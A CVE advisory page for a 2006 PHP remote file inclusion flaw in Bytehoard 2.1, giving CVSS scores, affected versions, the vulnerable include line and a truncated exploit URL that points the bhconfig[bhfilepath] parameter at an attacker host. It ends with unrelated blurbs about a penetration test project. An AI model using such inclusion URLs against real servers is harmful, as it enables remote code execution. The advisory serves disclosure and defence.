CVE-2006-2849

Published: 06/06/2006 Updated: 18/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in includes/webdav/server.php in Bytehoard 2.1 Epsilon/Delta allows remote malicious users to execute arbitrary PHP code via a URL in the bhconfig[bhfilepath] parameter.

Vulnerable Product

andrew godwin bytehoard 2.1_delta

andrew godwin bytehoard 2.1_epsilon

Exploits

Script: Bytehoard 2.1 Epsilon/Delta
www.bytehoard.org
Discovered: beford <xbefordx gmail com>
File: /bytehoard/includes/webdav/server.php
Vuln: Remote File Include
[code]
require_once $bhconfig['bhfilepath']."/includes/webdav/_parse_propfind.php";
[/code]
url.com/bytehoard/includes/webdav/server.php?bhconfig[bhfilepath]=attacker ...

Github Repositories

A description of a Penetration Test project, including assessments from the Red and Blue team, and a final report.

Red Team and Blue Team Penetration Test and Reporting Project

The tactics, techniques, methods and procedures in this repository were used during an authorized penetration test and were compiled into a written report. This project was split into three phases to provide insight about how an attack may occur, how the incident response team analyzes the logs to discover the attack